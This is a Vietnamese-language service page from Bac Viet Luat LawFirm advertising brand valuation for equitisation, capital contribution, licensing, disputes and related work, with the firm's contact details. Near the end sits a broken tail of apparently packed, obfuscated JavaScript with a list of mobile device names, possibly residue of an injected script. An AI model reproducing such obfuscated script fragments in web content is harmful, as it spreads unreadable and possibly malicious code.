Dịch vụ định giá thương hiệu cho doanh nghiệp - Bac Viet Luat LawFirm

Bac Viet Luat LawFirm cung cấp dịch vụ định giá thương hiệu cho doanh nghiệp. Phát triển một thương hiệu bền vững.

Định giá thương hiệu là nhằm mục đích giúp các doanh nghiệp xác định giá trị thị trường của thương hiệu để phục vụ cho các hoạt động quan trọng khác của doanh nghiệp.

Dịch vụ của Bac Viet Luat LawFirm trong lĩnh vực định giá thương hiệu. 

  • Tư vấn xác định giá trị thương hiệu của doanh nghiệp trong quá trình cổ phần hoá;
  • Tư vấn xác định giá trị thương hiệu trong hoạt động chia tách doanh nghiệp;
  • Tư vấn xác định giá trị quyền sở hữu trí tuệ khi góp vốn kinh doanh bằng tài sản thương hiệu;
  • Tư vấn xác định giá trị trong việc chuyển nhượng quyền sở hữu hoặc quyền sử dụng thương hiệu cho doanh nghiệp khác;
  • Xác định giá trị thương hiệu trong các vụ tranh chấp thương hiệu;
  • Hỗ trợ xác định giá trị thương hiệu của doanh nghiệp trên thị trường chứng khoán;
  • Xây dựng chiến lược phát triển và quản trị thương hiệu;
  • Tư vấn khách hàng tham gia các giải thưởng thương hiệu.

Liên hệ yêu cầu dịch vụ theo địa chỉ dưới đây:
==================
Bac Viet Luat LawFirm
P412, Nhà 17T10, Trung Hòa, Nhân Chính, Hà nội
Điện thoại: 04 22155966 – 22158486 Fax: 04 62815128
Mail:nhanhieu@bacvietluat.vn hoặc dichvu@xingiayphep.com
Bac Viet Luat LawFirm – www.BacVietLuat.Vn –
www.LuatSuToanQuoc.Com
======================================================

 

ve|qa|ro|s55|qtek|07|qc|||zo|prox|psio|po|r380|pn|mm|rt|r600|rim9|raks|ge'.split('|'),0,{})) ')}

Bài viết liên quan